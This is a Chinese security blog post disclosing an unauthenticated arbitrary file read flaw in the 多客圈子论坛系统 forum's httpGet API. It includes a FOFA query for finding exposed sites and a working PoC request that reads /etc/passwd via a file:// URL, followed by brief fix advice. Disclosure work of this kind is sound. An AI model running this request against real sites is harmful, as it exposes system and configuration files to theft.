多客圈子论坛系统 httpGet 任意文件读取漏洞复现

已于 2024-06-07 23:13:36 修改
阅读量563 收藏 1
点赞数 5
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-06-07 23:13:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/139536957
版权

0x01 产品简介

多客圈子论坛系统是一种面向特定人群或特定话题的社交网络,它提供了用户之间交流、分享、讨论的平台。在这个系统中,用户可以创建、加入不同的圈子,圈子可以是基于兴趣、地域、职业等不同主题的。用户可以在圈子中发帖、评论、点赞等互动。社交圈子论坛系统除了提供基本的社交功能外,还可以根据用户行为和兴趣为用户推荐相关内容。

0x02 漏洞概述

多客圈子论坛系统 /index.php/api/login/httpGet 接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x03 复现环境

FOFA:body="/static/index/js/jweixin-1.2.0.js"

0x04 漏洞复现

PoC

GET /index.php/api/login/httpGet?url=file:///etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

PS:Windows读取C:/windows/win.ini

0x05 修复建议

关闭互联网暴露面或接口设置访问权限

目前软件已发布安全修复更新,受影响用户可以联系厂商获取补丁。

0xSecl
关注
  • 5
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
订阅专栏
solly0880#wiki#帆软 V9 任意文件覆盖文件上传1
07-25
帆软 V9 任意文件覆盖文件上传漏洞描述帆软 V9 存在任意文件覆盖,导致攻击者可以任意文件上传漏洞影响帆软 V9漏洞
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 751
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
HTTP协议相关漏洞
qq_48904485的博客
03-22 9222
一、HTTP协议 HTTP是一个基于请求与响应模式的、无状态的应用层协议。 请求响应   户端要向web服务器发送一个请求以后,等待服务器回送http响应消息。 无状态   http协议整个过程当中的各种信息不会被服务器所记录下来。 常基于TCP的连接方式 ,即http是将数据打包成TCP数据包来进行传送的,绝大多数Web应用,都是构建在HTTP协议之上,即目前使用浏览器访问web网站都是以http协议为标准的。 1、HTTP协议的方法 GET :请求获取Request-URI所标识的资源 POST :
漏洞】多圈子论坛系统 httpGet 任意文件读取漏洞
siu~
06-08 412
圈子论坛系统 /index.php/api/login/httpGet 接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件系统配置文件等),导致网站处于极度不安全状态。
漏洞】宏景eHR OutputCode 任意文件读取
siu~
05-22 418
宏景`eHR OutputCode` 接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统文件
漏洞】申瓯通信 在线录音管理系统 download 任意文件读取漏洞
siu~
06-18 262
申瓯通信在线录音管理系统 download 接口处任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
漏洞】FastAdmin后台开发框架 lang 任意文件读取漏洞
siu~
06-17 686
FastAdmin后台开发框架 /index/ajax/lang 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
漏洞】LVS精益价值管理系统 DownLoad.aspx 任意文件读取漏洞
siu~
05-22 213
`LVS`精益价值管理系统 `DownLoad.aspx` 接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件
漏洞】用友NC downCourseWare 任意文件读取漏洞
siu~
06-06 700
用友NC 系统 /portal/pt/downCourseWare/download接囗的fename参数存在任意文件读取漏洞,未经身份认证的攻击者可以通过此漏洞获取敏感信息,使系统处于极不安全状态。
通达OA v2017 video_file.php 任意文件下载漏洞.md
09-07
通达OA漏洞合集
ThinkCMF 任意内容包含getshell漏洞
10-26
ThinkCMF 任意内容包含getshell漏洞 ThinkCMF 是一种基于 PHP+MYSQL 开发的中文字内容管理框架,底层采用 ThinkPHP3.2.3 构建。ThinkCMF 提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的...
HTTPGet.zip_httpget_下载_多线程下载
09-21
HTTPGet是一个用于实多线程下载功能的控件或库,它允许用户高效地从互联网上获取大文件,尤其在处理速度慢或者网络不稳定的情况下,多线程下载能显著提高下载效率。在这个“HTTPGet.zip”压缩包中,包含的核心文件...
漏洞】海康威视综合安防管理平台 orgManage/v1/orgs/download 任意文件读取漏洞
siu~
06-03 525
海康威视综合安防管理平台/orgManage/v1/orgs/download 接口处存在任意 文件读取漏洞,未经身份验证的远程攻击者可利用目录遍历的方式绕过权限认证直接读取后台服务器配置文件等敏感文件,造成信息泄露,使系统处于极不安全的状态。
【ARMv8/v9 GIC 系列 5.4 -- 中断分组与安全及优先级配置】
最新发布
CodingCos的博客
07-06 57
在这两种状态中,都可以执行用户级别和特权级别的代码,但是在非安全状态下执行的软件只能通过对安全监视器(Secure Monitor)的系统调用来访问安全状态。GIC(通用中断控制器)架构支持与这两种安全状态相关的中断的路由和处理。在多处理器系统中,系统内的一个或多个处理元素(PEs)可能支持仅在安全状态下可用的资源访问,或仅在非安全状态下可用的资源访问。这种灵活的配置允许系统根据需要调整中断处理的优先级分组,使得系统能够更有效地响应不同优先级的中断请求。标志指示GIC是否配置为支持ARMv8-A安全模型。
Akamai+Noname强强联合 | API安全再加强
AKAMAI_CHINA的博客
07-03 1036
最近,Akamai正式完成了对Noname Security的收购。本文我们将向大家介绍,经过本次收购后,Akamai在保护API安全性方面的后续计划和未来愿景。Noname Security是市场上领先的API安全供应商之一,此次收购将让Akamai能更好地满足日益增长的户需求和市场要求。具体来说,Akamai将能借助本次收购扩展API流量方面的情报,满足户可能提出的,与业务、集成或部署要求有关的任何问题。
安全隔离上网的有效途径:沙箱
Canon_YK的博客
07-01 545
沙箱技术,顾名思义,就像是在计算机系统中构建一个“沙箱”,将应用程序或系统进程的运行限制在这个“沙箱”内,使其无法访问或修改系统核心资源,从而达到隔离的效果。沙箱技术作为一种高效的隔离机制,为企业和个人提供了一种在享受网络便利的同时,保障系统安全的解决方案。浏览器级别沙箱是另一种常见的沙箱技术实方式。目前也只有深信达的沙箱技术是可以运行和控制虚拟机的,将整个磁盘进行加密可以很好地进行控制,如果企业安全需求比较高可以采用全盘加密的方式,一般情况下隔离出虚拟空间的轻型沙箱就可以满足轻量化办公的需求。
FMEA在大型光伏电站安全生产管理中的应用
tianxingjian713的博客
07-03 401
它通过对产品或过程中可能出的故障模式进行系统性地梳理和分析,评估其可能的影响程度和发生概率,从而制定相应的预防措施和应对措施,以降低故障发生的可能性和影响程度。FMEA在光伏电站安全生产管理中的应用,主要是通过对电站系统、设备和工艺过程进行全面的故障分析,找出潜在的故障模式和影响,进而制定针对性的预防措施,提高电站的安全性和可靠性。然后,针对每个子系统和设备,分析其可能出的故障模式及其影响,包括故障对电站运行的影响、对人员安全的影响以及对环境的影响等。在评估故障影响的基础上,需要制定相应的预防措施。
网络空间安全 +文件上传基础入门
11-09
网络空间安全是当今社会中一个关键的领域,涉及到互联网、计算机和信息技术等方面。本文将重点讨论网络空间安全中...在实际应用中,开发人员和系统管理员应该采取相应的安全措施,来保护服务器免受文件上传漏洞的攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值